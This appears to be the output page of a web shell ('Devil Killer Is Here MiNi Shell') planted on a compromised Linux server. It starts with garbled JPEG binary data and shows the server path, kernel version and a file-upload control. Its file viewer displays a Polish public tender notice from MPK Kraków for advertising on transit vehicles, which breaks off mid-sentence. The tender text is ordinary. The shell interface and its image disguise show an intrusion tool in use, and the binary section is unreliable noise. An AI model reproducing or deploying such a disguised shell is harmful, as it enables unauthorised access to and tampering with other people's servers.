JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211006/0021833201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług związanych z wykonywaniem reklam na i w pojazdach MPK S.A. w Krakowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejskie Przedsiębiorstwo Komunikacyjne Spółka Akcyjna w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 003911311</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Św. Wawrzyńca 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-060</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mpk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.mpk.krakow.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> transport publiczny </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług związanych z wykonywaniem reklam na i w pojazdach MPK S.A. w Krakowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bdcea19c-2054-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00218332</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mpk-krakow.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu Zamawiający<br/>będzie się kontaktował z Wykonawcami przy użyciu środków komunikacji elektronicznej zgodnie z<br/>Rozporządzeniem w sprawie środków komunikacji elektronicznej za pośrednictwem Platformy<br/>zakupowej (https://mpk-krakow.ezamawiajacy.pl/app/login) lub skrzynki mailowej Zamawiającego<br/>email: zamowienia@mpk.krakow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Korespondencja elektroniczna prowadzona jest w języku polskim i powinna być sporządzona,<br/>wysyłana i odbierana zgodnie z wymaganiami technicznymi i organizacyjnymi zawartymi w<br/>Rozporządzeniu w sprawie środków komunikacji elektronicznej. Korespondencja w języku obcym<br/>powinna być przekazana wraz z tłumaczeniem na język polski. W przypadku wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia korespondencja prowadzona będzie z pełnomocnikiem.<br/>2. Zgłoszenie do postępowania wymaga zalogowania wykonawcy do Platformy na subdomenie<br/>Miejskiego Przedsiębiorstwa Komunikacyjnego S.A. w Krakowie - https://mpkkrakow.<br/>ezamawiajacy.pl/app/login lub https://oneplace.marketplanet.pl. Założenie konta i korzystanie z<br/>Platformy jest bezpłatne i wymaga zaakceptowania przez wykonawcę zasad korzystania z Platformy<br/>zakupowej.<br/>3. Rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca<br/>wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w<br/>postępowaniu. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy<br/>skontaktować się pod numerem telefonu podanym w potwierdzeniu.<br/>4. Po założeniu konta Wykonawca ma możliwość złożenia oferty w postępowaniu.<br/>5. Niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie:<br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2,<br/>najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>d) Włączona obsługa JavaScript;<br/>e) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie<br/>.pdf.<br/>6. Dopuszczalne formaty przesyłanych danych to pliki o wielkości do 100 MB w txt, rtf, pdf ,xps, odt,<br/>ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg,<br/>mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt,<br/>TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc Zamawiający rekomenduje wykorzystanie formatów:<br/>.pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf W celu ewentualnej kompresji danych<br/>Zamawiający rekomenduje wykorzystanie jednego z formatów .zip lub .7Z Z uwagi na obowiązujące<br/>przepisy prawa pliki złożone w formatach .rar .gif .bmp .numbrs .pages. zostaną uznane za złożone<br/>nieskutecznie.<br/>7. Oferta (wszystkie dokumenty tworzące ofertę) powinna być sporządzona w języku polskim i złożona<br/>pod rygorem nieważności w formie elektronicznej (Dokument elektroniczny podpisany kwalifikowanym<br/>podpisem elektronicznym przez osobę/osoby upoważnione do reprezentacji Wykonawcy) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych osób fizycznych<br/>wskazanych w toku postępowania o udzielenie zamówienia, jest Miejskie Przedsiębiorstwo<br/>Komunikacyjne S.A. w Krakowie z siedzibą przy ul. św. Wawrzyńca 13 w Krakowie. Dane osobowe<br/>będą przetwarzane w celu udzielenia zamówienia oraz wypełnienia obowiązku archiwizacyjnego. Dane<br/>osobowe wskazanych osób będą przetwarzane na podstawie art. 6 ust. 1 lit. c) Rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE. Podanie danych jest dobrowolne, ale niezbędne do<br/>przeprowadzenia postępowania o udzielenie zamówienia. Osobom, których dane dotyczą, przysługuje<br/>prawo do żądania dostępu do swoich danych osobowych, ich sprostowania, oraz do ograniczenia ich<br/>przetwarzania, z zastrzeżeniem, że żądanie ograniczenia przetwarzania danych nie będzie<br/>realizowane do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o<br/>którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu<br/>końcowego postępowania oraz jego załączników, o których mowa w dziale XI ustawy Prawo zamówień<br/>publicznych. Osoby, których dane dotyczą mają prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych. Osobom, których dane dotyczą nie przysługuje prawo do usunięcia<br/>danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO , prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO , prawo sprzeciwu na podstawie art. 21 RODO, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6<br/>ust. 1 lit. c RODO. Dane osobowe będą przetwarzane przez okres 10 lat od roku następującego po<br/>roku, w którym zakończono postępowanie. Po upływie tego okresu dane zostaną zniszczone lub<br/>przekazane do Archiwum Narodowego. Odbiorcami Państwa danych osobowych będą te podmioty,<br/>którym mamy obowiązek przekazywania danych na gruncie obowiązujących przepisów prawa, w tym<br/>ustawy o dostępie do informacji publicznej oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w<br/>Warszawie (02-672) przy ul. Domaniewskiej 49, wpisana do rejestru przedsiębiorców Krajowego<br/>Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla M. St. Warszawy w Warszawie XIII<br/>Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON:<br/>017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Miejskie<br/>Przedsiębiorstwo Komunikacyjne S.A. w Krakowie prowadzi postępowania o udzielenie zamówienia<br/>publicznego. Platforma Zakupowa działa pod adresem: https://mpk-krakow.ezamawiajacy.pl. Po stronie<br/>Wykonawcy leży obowiązek uzyskania zgody osoby fizycznej na wskazanie jej danych w<br/>postępowaniu o udzielenie zamówienia, w tym w składanej ofercie. W przypadku jakichkolwiek pytań<br/>możliwy jest kontakt z Inspektorem Ochrony Danych Osobowych MPK S.A. w Krakowie poprzez adres<br/>email: iodo@mpk.krakow.pl lub telefonicznie +48 12 254 14 54.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Żądanie ograniczenia przetwarzania danych nie będzie<br/>realizowane do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu<br/>końcowego postępowania oraz jego załączników, o których mowa w dziale XI ustawy Prawo zamówień<br/>publicznych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">LP.281.109.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 850000 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług związanych z wykonywaniem reklam będących zarówno reklamami własnymi Zamawiającego, jak i reklamami podmiotów zewnętrznych (Klientów). Szacunkową ilość reklam oraz montaż i demontaż plakatów/naklejek, przewidzianych do wykonania w ciągu 24 miesięcy obowiązywania umowy określa SWZ. Wykaz pojazdów, jakie Zamawiający może udostępnić pod reklamę, wraz z orientacyjnymi wymiarami powierzchni przeznaczonych pod reklamę stanowi załącznik do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79341000-6 - Usługi reklamowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocena ofert nastąpi zgodnie z przepisami ustawy Pzp oraz<br/>wymaganiami SWZ.<br/>2.	Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami:<br/>Cena oferty brutto: 100% wyrażona w PLN<br/>ocena ofert w tym kryterium zostanie określona w oparciu o wzór :<br/>Vxc= (Cn / Cx) x 100% x100 gdzie :<br/>Vxc – ilość punktów za cenę brutto proponowaną w ofercie badanej<br/>Cn – najniższa cena brutto spośród badanych ofert;<br/>Cx – cena brutto w ofercie badanej.<br/>1% odpowiada w punktacji końcowej 1 pkt.<br/>Maksymalną liczbę punktów – 100 pkt. otrzyma oferta z najniższą ceną brutto, pozostałe oferty otrzymają punkty przy zastosowaniu powyższego wzoru. <br/>3.	Za ofertę najkorzystniejszą zostanie uznana oferta, która spełnia wszystkie wymagania określone w Dokumentach zamówienia z najniższą ceną.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej:<br/>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże wykonanie nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie usług polegających na wykonaniu reklam o łącznej wartości tych usług co najmniej 350 000 zł netto (słownie: trzysta pięćdziesiąt tysięcy zł netto), obejmujących: <br/>a)	każdorazowo opracowanie projektu reklamy i nałożenie minimum 25 szt. reklam całopojazdowych o powierzchni reklamy min. 25 m2 – każda na zewnętrznej powierzchni pojazdów komunikacji pasażerskiej.<br/>b)	wykonanie reklam o łącznej powierzchni minimum 5 m 2 metodą wyklejania pojazdu z użyciem folii wylewanej.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub Wykonawców korzystających z zasobów podmiotów trzecich warunki określone powyżej mogą być spełnione łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw do wykluczenia z postępowania zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie nie<br/>krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących dokumentów: 1.1.	informacji z Krajowego Rejestru Karnego sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem w zakresie art. 108 ust. 1 pkt 1 i 2 ustawy Pzp; art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej ukarania za wykroczenie, za które wymierzono karę aresztu; <br/>1.2.	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia stanowi załącznik nr 5 do SWZ.;<br/>1.3.	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>1.4.	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>1.5.	Oświadczenie o aktualności informacji według wzoru stanowiącego załącznik nr 6 do SWZ, o którym mowa w art. 125 ust. 1 ustawy Pzp. <br/>1.6.	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2. Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu w przypadku, gdy wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej zawiera SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia<br/>następujących dokumentów:<br/>1.1. wykaz usług wykonanych w okresie ostatnich trzech lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem przedmiotu wykonanych usług, dat wykonania, podmiotów na rzecz których usługi<br/>zostały wykonane. Wzór wykazu stanowi załącznik nr 3 do SWZ. Pod pojęciem „usługi wykonane”<br/>rozumie się usługi zrealizowane.Do wykazu należy dołączyć dowody określające czy te usługi zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów z - oświadczenie wykonawcy;2. W<br/>przypadku gdy oferta jest składana przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia dopuszcza się aby warunek opisany w pkt 1.4 był spełniony łącznie tzn. jeden z<br/>wykonawców może wykonać prace określone w pkt 1.4 lit. a, a drugi – prace określone w pkt 1.4. lit. b.<br/>3. W odniesieniu do warunku opisanego w pkt 1.4. wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji<br/>których te zdolności są wymagane. Wówczas do oferty należy załączyć oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 9 do<br/>SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 12 700,00 zł (słownie: dwanaście tysięcy siedemset złotych 